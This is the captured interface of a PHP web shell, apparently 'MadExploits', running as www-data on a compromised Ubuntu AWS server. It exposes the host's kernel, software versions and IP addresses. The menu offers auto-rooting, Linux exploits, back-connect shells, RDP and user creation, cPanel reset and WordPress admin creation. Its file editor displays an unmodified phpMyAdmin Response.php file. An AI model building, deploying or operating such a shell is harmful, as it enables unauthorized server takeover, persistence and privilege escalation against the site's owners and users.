Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.147.69.134
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
src /
Http /
[ HOME SHELL ]
Name
Size
Permission
Action
Factory
[ DIR ]
drwxr-xr-x
Handler
[ DIR ]
drwxr-xr-x
Middleware
[ DIR ]
drwxr-xr-x
Response.php
2.31
KB
-rw-r--r--
ServerRequest.php
7.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Response.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Http; use Psr\Http\Message\ResponseInterface; use Psr\Http\Message\StreamInterface; final class Response implements ResponseInterface { public function __construct(private ResponseInterface $response) { } public function getProtocolVersion(): string { return $this->response->getProtocolVersion(); } public function withProtocolVersion(string $version): Response { return new Response($this->response->withProtocolVersion($version)); } /** @inheritDoc */ public function getHeaders(): array { return $this->response->getHeaders(); } public function hasHeader(string $name): bool { return $this->response->hasHeader($name); } /** @inheritDoc */ public function getHeader(string $name): array { return $this->response->getHeader($name); } public function getHeaderLine(string $name): string { return $this->response->getHeaderLine($name); } /** @inheritDoc */ public function withHeader(string $name, $value): Response { return new Response($this->response->withHeader($name, $value)); } /** @inheritDoc */ public function withAddedHeader(string $name, $value): Response { return new Response($this->response->withAddedHeader($name, $value)); } public function withoutHeader(string $name): Response { return new Response($this->response->withoutHeader($name)); } public function getBody(): StreamInterface { return $this->response->getBody(); } public function withBody(StreamInterface $body): Response { return new Response($this->response->withBody($body)); } public function getStatusCode(): int { return $this->response->getStatusCode(); } public function withStatus(int $code, string $reasonPhrase = ''): Response { return new Response($this->response->withStatus($code, $reasonPhrase)); } public function getReasonPhrase(): string { return $this->response->getReasonPhrase(); } /** * Write data to the body of the response. */ public function write(string $string): Response { $this->response->getBody()->write($string); return $this; } }
Close